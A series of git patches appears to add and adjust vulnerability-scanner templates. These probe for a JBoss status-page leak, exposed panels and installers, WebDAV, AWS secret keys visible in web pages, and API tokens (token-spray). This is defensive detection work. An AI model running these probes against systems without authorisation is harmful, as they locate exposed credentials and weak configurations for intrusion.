<78642744+mr-rizwan-syed@users.noreply.github.com> Date: Thu, 12 Jan 2023 14:36:29 +0530 Subject: [PATCH 0872/1133] Create CVE-2008-3273.yaml --- cves/2008/CVE-2008-3273.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2008/CVE-2008-3273.yaml diff --git a/cves/2008/CVE-2008-3273.yaml b/cves/2008/CVE-2008-3273.yaml new file mode 100644 index 0000000000..427cb2a215 --- /dev/null +++ b/cves/2008/CVE-2008-3273.yaml @@ -0,0 +1,26 @@ +id: CVE-2008-3273_JBoss_EAP_Sensitive_Information_Leakage_Server_Status + +info: + name: CVE-2008-3273 JBoss EAP Sensitive Information Leakage Server Status + description: CVE-2008-3273, CVE-2010-1429 + author: R12W4N + severity: low + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + tags: jboss,eap,tomcat + +requests: + - method: GET + path: + - "{{BaseURL}}/status?full=true" + matchers-condition: and + matchers: + - type: word + words: + - "JVM" + - "memory" + condition: and + + - type: status + status: + - 200 From f508db076957ca2ff69e394f7f07ef36047437da Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 12 Jan 2023 14:51:19 +0530 Subject: [PATCH 0873/1133] spacing --- misconfiguration/installer/pmm-installer.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/installer/pmm-installer.yaml b/misconfiguration/installer/pmm-installer.yaml index cf159a7187..34882dcc5b 100644 --- a/misconfiguration/installer/pmm-installer.yaml +++ b/misconfiguration/installer/pmm-installer.yaml @@ -20,6 +20,7 @@ requests: part: body words: - "PMM Installation Wizard" + - type: word part: header words: @@ -27,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 617b372b83aa8fdd658bd6297a7ce626c7ce7488 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Jan 2023 09:24:02 +0000 Subject: [PATCH 0874/1133] Auto Generated New Template Addition List [Thu Jan 12 09:24:02 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index eb1caf72c3..9f9aa46fe7 100644 --- a/.new-additions +++ b/.new-additions @@ -13,9 +13,11 @@ file/keys/stackhawk-api-key.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml +misconfiguration/installer/pmm-installer.yaml misconfiguration/phpcli-stack-trace.yaml technologies/dash-panel-detect.yaml technologies/default-cakephp-page.yaml technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml +technologies/wordpress/plugins/webp-express.yaml From 933d7c6fe02648f7caba83dcdb5ceab9467731b8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Jan 2023 09:43:49 +0000 Subject: [PATCH 0875/1133] Auto Generated CVE annotations [Thu Jan 12 09:43:49 UTC 2023] :robot: --- cves/2022/CVE-2022-44877.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2022/CVE-2022-44877.yaml b/cves/2022/CVE-2022-44877.yaml index b921cd36e6..3f2261cc9d 100644 --- a/cves/2022/CVE-2022-44877.yaml +++ b/cves/2022/CVE-2022-44877.yaml @@ -12,7 +12,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-44877 + cwe-id: CWE-78 metadata: shodan-query: http.title:"Login | Control WebPanel" verified: "true" From 3c6b1b5d787b57c4891dbaadb750b382aac3dc14 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 12 Jan 2023 17:27:34 +0530 Subject: [PATCH 0876/1133] Citrix Hypervisor Page Detection --- technologies/citrix-hypervisor-page.yaml | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 technologies/citrix-hypervisor-page.yaml diff --git a/technologies/citrix-hypervisor-page.yaml b/technologies/citrix-hypervisor-page.yaml new file mode 100644 index 0000000000..902b90a892 --- /dev/null +++ b/technologies/citrix-hypervisor-page.yaml @@ -0,0 +1,35 @@ +id: citrix-hypervisor-page + +info: + name: Citrix Hypervisor Page Detection + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: http.title:"Welcome to Citrix Hypervisor" + tags: tech,citrix,default-page + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to Citrix Hypervisor' + - 'XenCenter' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Welcome to Citrix Hypervisor ([0-9. ]+)" \ No newline at end of file From 7c5c5ee9a69fc4a0700606defb2b729e080e9fa6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 12 Jan 2023 17:44:55 +0530 Subject: [PATCH 0877/1133] matcher -update --- technologies/ntop-detect.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/technologies/ntop-detect.yaml b/technologies/ntop-detect.yaml index 9c67632c6d..28a12e20c8 100644 --- a/technologies/ntop-detect.yaml +++ b/technologies/ntop-detect.yaml @@ -22,8 +22,6 @@ requests: part: body words: - 'Welcome to ntop' - - 'Documentation' - condition: and - type: status status: From 3b465fe26e485d920496f5b662e723d4e3330d79 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 12 Jan 2023 20:21:30 +0700 Subject: [PATCH 0878/1133] fix: fix false positive on nagios default --- default-logins/nagios/nagios-default-login.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index 3672516797..797db06399 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -36,6 +36,12 @@ requests: - 200 - type: word + part: header + words: + - 'text/html' + + - type: word + part: body words: - 'Current Status' - 'Reports' From 0dfb7416f452c0e76ffd4da0acf43142a0311af0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 04:02:07 +0000 Subject: [PATCH 0879/1133] Auto WordPress Plugins Update [Fri Jan 13 04:02:07 UTC 2023] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/disable-comments.txt | 2 +- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt | 2 +- helpers/wordpress/plugins/google-analytics-for-wordpress.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- 10 files changed, 10 insertions(+), 10 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index a22a281799..88ea5ace53 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.2.8 \ No newline at end of file +4.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-comments.txt b/helpers/wordpress/plugins/disable-comments.txt index acdc3f1b0b..6550da6970 100644 --- a/helpers/wordpress/plugins/disable-comments.txt +++ b/helpers/wordpress/plugins/disable-comments.txt @@ -1 +1 @@ -2.4.2 \ No newline at end of file +2.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index 393072c7a6..29fe95d7a3 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -5.5.5 \ No newline at end of file +5.5.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index 573e3c6c16..2555164e23 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.11.0 \ No newline at end of file +7.12.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index 62f6898c18..4e28b08624 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.11.0 \ No newline at end of file +8.12.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index 6d99b7aae6..ff54b8a8d7 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.28.2 \ No newline at end of file +3.28.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index f93ea0ca33..6acdb44289 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.0.2 \ No newline at end of file +2.0.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index e3a4f19336..cc6612c36e 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.2.0 \ No newline at end of file +2.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 565a0d44fd..4c22129092 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.2.10 \ No newline at end of file +2.2.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 7796a13c20..8b23b8d47c 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.2.3 \ No newline at end of file +7.3.0 \ No newline at end of file From 8d11a9afb76efbf82ea6fb136df6d7cea8ffa82e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 12:07:49 +0530 Subject: [PATCH 0880/1133] fix --- technologies/ntop-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/ntop-detect.yaml b/technologies/ntop-detect.yaml index 28a12e20c8..3d965372fe 100644 --- a/technologies/ntop-detect.yaml +++ b/technologies/ntop-detect.yaml @@ -1,4 +1,4 @@ -id: ntop-detection +id: ntop-detect info: name: Ntop Detect From d61e2ae98b4eb79c5d70d953d0b235d4c556e112 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 06:40:03 +0000 Subject: [PATCH 0881/1133] Auto Generated New Template Addition List [Fri Jan 13 06:40:03 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9f9aa46fe7..ef56eff2b3 100644 --- a/.new-additions +++ b/.new-additions @@ -20,4 +20,5 @@ technologies/default-cakephp-page.yaml technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml +technologies/ntop-detect.yaml technologies/wordpress/plugins/webp-express.yaml From 02004a0b50b9741f99661accef1d6792a2acab48 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 06:45:12 +0000 Subject: [PATCH 0882/1133] Auto Generated New Template Addition List [Fri Jan 13 06:45:12 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ef56eff2b3..437f0edf34 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/installer/pmm-installer.yaml misconfiguration/phpcli-stack-trace.yaml +technologies/citrix-hypervisor-page.yaml technologies/dash-panel-detect.yaml technologies/default-cakephp-page.yaml technologies/default-symfony-page.yaml From c8db688307547b5308a75f186569fe94e5c52af7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 12:20:52 +0530 Subject: [PATCH 0883/1133] fix-template --- exposures/tokens/amazon/aws-secret-key.yaml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/exposures/tokens/amazon/aws-secret-key.yaml b/exposures/tokens/amazon/aws-secret-key.yaml index a96db99d35..e2ab3b12f1 100644 --- a/exposures/tokens/amazon/aws-secret-key.yaml +++ b/exposures/tokens/amazon/aws-secret-key.yaml @@ -6,27 +6,22 @@ info: severity: unknown metadata: verified: "true" - tags: secret,aws,generic,exposure + tags: secret,aws,generic,exposure,amazon requests: - method: GET path: - - '{{BaseURL}}/' + - '{{BaseURL}}' matchers-condition: and matchers: - - type: word + part: body words: - 'accessKeyId' - 'secretAccessKey' - part: body condition: and - - - type: word - part: header - words: - - "text/html" + case-insensitive: true - type: status status: From 0087df07099204a2c185b629aed49585743d6523 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 12:22:49 +0530 Subject: [PATCH 0884/1133] added-additional-path --- exposed-panels/ldap-account-manager-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ldap-account-manager-panel.yaml b/exposed-panels/ldap-account-manager-panel.yaml index c07837d57e..9efa278cab 100644 --- a/exposed-panels/ldap-account-manager-panel.yaml +++ b/exposed-panels/ldap-account-manager-panel.yaml @@ -21,6 +21,7 @@ requests: - method: GET path: - "{{BaseURL}}/templates/login.php" + - "{{BaseURL}}/lam/templates/login.php" matchers-condition: and matchers: From c197a1287abd16ee6930701afbb10cecf4564348 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 06:57:42 +0000 Subject: [PATCH 0885/1133] Auto Generated New Template Addition List [Fri Jan 13 06:57:41 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 437f0edf34..105a02ab9d 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ cves/2022/CVE-2022-44877.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml +exposed-panels/ldap-account-manager-panel.yaml exposed-panels/monstra-admin-panel.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml From 4aa795953a91928f93b7b00b30b43270dea69278 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 07:32:01 +0000 Subject: [PATCH 0886/1133] Auto Generated New Template Addition List [Fri Jan 13 07:32:01 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 105a02ab9d..b94ce514fa 100644 --- a/.new-additions +++ b/.new-additions @@ -7,7 +7,9 @@ default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposed-panels/ldap-account-manager-panel.yaml +exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml +exposed-panels/storybook-panel.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml From 03197cf06e1d812fff55a395f57c0573a35a450b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 14:03:10 +0530 Subject: [PATCH 0887/1133] fix-template --- technologies/default-runcloud-page.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/technologies/default-runcloud-page.yaml b/technologies/default-runcloud-page.yaml index 01da2562a3..2f72784a1e 100644 --- a/technologies/default-runcloud-page.yaml +++ b/technologies/default-runcloud-page.yaml @@ -20,9 +20,7 @@ requests: part: body words: - 'Welcome To RunCloud' - - 'Getting Started' - condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From f85b31770002957d34a68a687e4a6370a28f0b77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 08:36:08 +0000 Subject: [PATCH 0888/1133] Auto Generated New Template Addition List [Fri Jan 13 08:36:08 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b94ce514fa..980ac833b7 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ misconfiguration/phpcli-stack-trace.yaml technologies/citrix-hypervisor-page.yaml technologies/dash-panel-detect.yaml technologies/default-cakephp-page.yaml +technologies/default-runcloud-page.yaml technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml From ad59c9c32637e7b0fcd94641242990afdbd8f6db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 14:20:23 +0530 Subject: [PATCH 0889/1133] fix-template --- misconfiguration/webdav-enabled.yaml | 38 ++++++++++++++++++++++++++++ misconfiguration/webdav-exposed.yaml | 24 ------------------ 2 files changed, 38 insertions(+), 24 deletions(-) create mode 100644 misconfiguration/webdav-enabled.yaml delete mode 100644 misconfiguration/webdav-exposed.yaml diff --git a/misconfiguration/webdav-enabled.yaml b/misconfiguration/webdav-enabled.yaml new file mode 100644 index 0000000000..f52e2f3ff9 --- /dev/null +++ b/misconfiguration/webdav-enabled.yaml @@ -0,0 +1,38 @@ +id: webdav-enabled + +info: + name: WebDAV Enabled + author: tess + severity: info + description: | + WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on your web server. + remediation: | + If you are not using this extension, it's recommended to be disabled. + reference: + - https://www.acunetix.com/vulnerabilities/web/webdav-enabled/ + metadata: + verified: "true" + shodan-query: Ms-Author-Via: DAV + tags: webdav,misconfig,exposure + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + OPTIONS / HTTP/1.1 + Host: {{Hostname}} + + - | + OPTIONS / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YW5vbnltb3VzOmFub255bW91cw== + + stop-at-first-match: true + matchers: + - type: word + part: header + words: + - "Ms-Author-Via: DAV" diff --git a/misconfiguration/webdav-exposed.yaml b/misconfiguration/webdav-exposed.yaml deleted file mode 100644 index 61010750af..0000000000 --- a/misconfiguration/webdav-exposed.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: webdav-exposed - -info: - name: Web Dav Exposed - author: tess - description: WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on the web server. - severity: info - tags: webdav,misconfig,exposure - -requests: - - raw: - - | - OPTIONS / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YW5vbnltb3VzOmFub255bW91cw== - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 - Accept-Encoding: gzip,deflate,br - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 - - matchers: - - type: word - part: header - words: - - "Ms-Author-Via: DAV" From 664802f5a1baf89715b10144251cac84544d35a0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 14:23:17 +0530 Subject: [PATCH 0890/1133] lint-fix --- misconfiguration/webdav-enabled.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/webdav-enabled.yaml b/misconfiguration/webdav-enabled.yaml index f52e2f3ff9..471ffc6a4d 100644 --- a/misconfiguration/webdav-enabled.yaml +++ b/misconfiguration/webdav-enabled.yaml @@ -12,7 +12,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/webdav-enabled/ metadata: verified: "true" - shodan-query: Ms-Author-Via: DAV + shodan-query: "Ms-Author-Via: DAV" tags: webdav,misconfig,exposure requests: From 2699c5a8afc5b57fb45645770a7d327d2680f8b6 Mon Sep 17 00:00:00 2001 From: Pugalarasan <75373225+0xPugazh@users.noreply.github.com> Date: Fri, 13 Jan 2023 14:24:21 +0530 Subject: [PATCH 0891/1133] Create api-ipdata.yaml --- token-spray/api-ipdata.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 token-spray/api-ipdata.yaml diff --git a/token-spray/api-ipdata.yaml b/token-spray/api-ipdata.yaml new file mode 100644 index 0000000000..55dcd7a70d --- /dev/null +++ b/token-spray/api-ipdata.yaml @@ -0,0 +1,28 @@ +id: api-ipdata + +info: + name: IP Data API Test + author: 0xlittleboy + severity: info + reference: + - https://docs.ipdata.co/docs + metadata: + verified: true + tags: token-spray,ipdata + +self-contained: true +requests: + - method: GET + path: + - "https://api.ipdata.co/?api-key={{token}}" + matchers: + - type: word + part: body + words: + - '"ip"' + - '"name"' + - '"asn"' + - '"route"' + - '"time_zone"' + - '"carrier"' + condition: and From 54c35f207bd7f7352a959041ca008546989d4253 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 08:56:05 +0000 Subject: [PATCH 0892/1133] Auto Generated New Template Addition List [Fri Jan 13 08:56:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 980ac833b7..c0f639a2a2 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/installer/pmm-installer.yaml misconfiguration/phpcli-stack-trace.yaml +misconfiguration/webdav-enabled.yaml technologies/citrix-hypervisor-page.yaml technologies/dash-panel-detect.yaml technologies/default-cakephp-page.yaml From d6160a60f5e6932cfabe007623564b1f3e0c6ebc Mon Sep 17 00:00:00 2001 From: Pugalarasan <75373225+0xPugazh@users.noreply.github.com> Date: Fri, 13 Jan 2023 14:35:32 +0530 Subject: [PATCH 0893/1133] Create api-ipinfo.yaml --- token-spray/api-ipinfo.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 token-spray/api-ipinfo.yaml diff --git a/token-spray/api-ipinfo.yaml b/token-spray/api-ipinfo.yaml new file mode 100644 index 0000000000..e6bbfe06a2 --- /dev/null +++ b/token-spray/api-ipinfo.yaml @@ -0,0 +1,27 @@ +id: api-ipinfo + +info: + name: IPinfo API Test + author: 0xlittleboy + severity: info + reference: + - https://ipinfo.io/developers + metadata: + verified: true + tags: token-spray,ipinfo + +self-contained: true +requests: + - method: GET + path: + - "https://ipinfo.io/?token={{token}}" + matchers: + - type: word + part: body + words: + - '"ip"' + - '"city"' + - '"org"' + - '"postal"' + - '"timezone"' + condition: and From e8f84eb9afc6f028d023882832e0ddf4dbdb4cb4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 13 Jan 2023 15:56:18 +0530 Subject: [PATCH 0894/1133] format -update --- exposed-panels/sap-successfactors-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/sap-successfactors-detect.yaml b/exposed-panels/sap-successfactors-detect.yaml index 019a8e2921..bfe77aea93 100644 --- a/exposed-panels/sap-successfactors-detect.yaml +++ b/exposed-panels/sap-successfactors-detect.yaml @@ -18,10 +18,10 @@ requests: matchers: - type: word + part: body words: - 'SAP SuccessFactors' - 'ajaxSecKey=' - part: body condition: and - type: word From 3dd3533b7f80c51e03d404b93deb6a38132e15e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 13 Jan 2023 16:50:39 +0530 Subject: [PATCH 0895/1133] fix-matcher --- token-spray/api-ipdata.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/token-spray/api-ipdata.yaml b/token-spray/api-ipdata.yaml index 55dcd7a70d..ea70697139 100644 --- a/token-spray/api-ipdata.yaml +++ b/token-spray/api-ipdata.yaml @@ -15,14 +15,14 @@ requests: - method: GET path: - "https://api.ipdata.co/?api-key={{token}}" + matchers: - type: word part: body words: - - '"ip"' - - '"name"' - - '"asn"' - - '"route"' - - '"time_zone"' - - '"carrier"' + - '"ip":' + - '"name":' + - '"asn":' + - '"route":' + - '"time_zone":' condition: and From 2c19d5bea8e1ee4be94995f3918674b07657cdb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 11:47:58 +0000 Subject: [PATCH 0896/1133] Auto Generated New Template Addition List [Fri Jan 13 11:47:58 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c0f639a2a2..2c56d6bd87 100644 --- a/.new-additions +++ b/.new-additions @@ -28,3 +28,4 @@ technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml technologies/wordpress/plugins/webp-express.yaml +token-spray/api-ipdata.yaml From ec4980a5eb827622a62bc8268bf3ad6a19ddceb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 11:51:54 +0000 Subject: [PATCH 0897/1133] Auto Generated New Template Addition List [Fri Jan 13 11:51:54 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2c56d6bd87..9e10e7ae53 100644 --- a/.new-additions +++ b/.new-additions @@ -29,3 +29,4 @@ technologies/monstracms-detect.yaml technologies/ntop-detect.yaml technologies/wordpress/plugins/webp-express.yaml token-spray/api-ipdata.yaml +token-spray/api-ipinfo.yaml From cf23b9917fd19d83df679aa5565f445da561ce40 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 13 Jan 2023 16:09:29 -0500 Subject: [PATCH 0898/1133] Create springboot-eureka.yaml --- .../springboot/springboot-eureka.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/springboot/springboot-eureka.yaml diff --git a/misconfiguration/springboot/springboot-eureka.yaml b/misconfiguration/springboot/springboot-eureka.yaml new file mode 100644 index 0000000000..8b098e9b23 --- /dev/null +++ b/misconfiguration/springboot/springboot-eureka.yaml @@ -0,0 +1,29 @@ +id: springboot-eureka-panel + +info: + name: Detects Springboot Eureka + author: tess + severity: medium + metadata: + verified: true + shodan-query: title:"Eureka" + tags: misconfig,springboot,exposure,eureka + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Eureka' + - 'Toggle navigation' + - 'Last 1000 since startup' + condition: and + + - type: status + status: + - 200 From e97154a3fba70db997a5f4e727270458f1992969 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 13 Jan 2023 16:11:24 -0500 Subject: [PATCH 0899/1133] Update springboot-eureka.yaml --- misconfiguration/springboot/springboot-eureka.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/springboot/springboot-eureka.yaml b/misconfiguration/springboot/springboot-eureka.yaml index 8b098e9b23..03fba13bf1 100644 --- a/misconfiguration/springboot/springboot-eureka.yaml +++ b/misconfiguration/springboot/springboot-eureka.yaml @@ -1,7 +1,7 @@ id: springboot-eureka-panel info: - name: Detects Springboot Eureka + name: Detects Springboot Eureka Panel author: tess severity: medium metadata: From 0af1232b9497af376530785ce12e10319c4d6682 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 14 Jan 2023 02:48:46 +0530 Subject: [PATCH 0900/1133] rename-template --- .../{springboot-eureka.yaml => spring-eureka.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename misconfiguration/springboot/{springboot-eureka.yaml => spring-eureka.yaml} (83%) diff --git a/misconfiguration/springboot/springboot-eureka.yaml b/misconfiguration/springboot/spring-eureka.yaml similarity index 83% rename from misconfiguration/springboot/springboot-eureka.yaml rename to misconfiguration/springboot/spring-eureka.yaml index 03fba13bf1..a155c059b3 100644 --- a/misconfiguration/springboot/springboot-eureka.yaml +++ b/misconfiguration/springboot/spring-eureka.yaml @@ -1,9 +1,9 @@ -id: springboot-eureka-panel +id: spring-eureka info: - name: Detects Springboot Eureka Panel + name: Spring Eureka Exposure author: tess - severity: medium + severity: low metadata: verified: true shodan-query: title:"Eureka" From 0282cb0fccd89ec083747e927db1289722856c90 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Jan 2023 21:22:33 +0000 Subject: [PATCH 0901/1133] Auto Generated New Template Addition List [Fri Jan 13 21:22:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9e10e7ae53..fc672cb4bc 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/installer/pmm-installer.yaml misconfiguration/phpcli-stack-trace.yaml +misconfiguration/springboot/spring-eureka.yaml misconfiguration/webdav-enabled.yaml technologies/citrix-hypervisor-page.yaml technologies/dash-panel-detect.yaml From 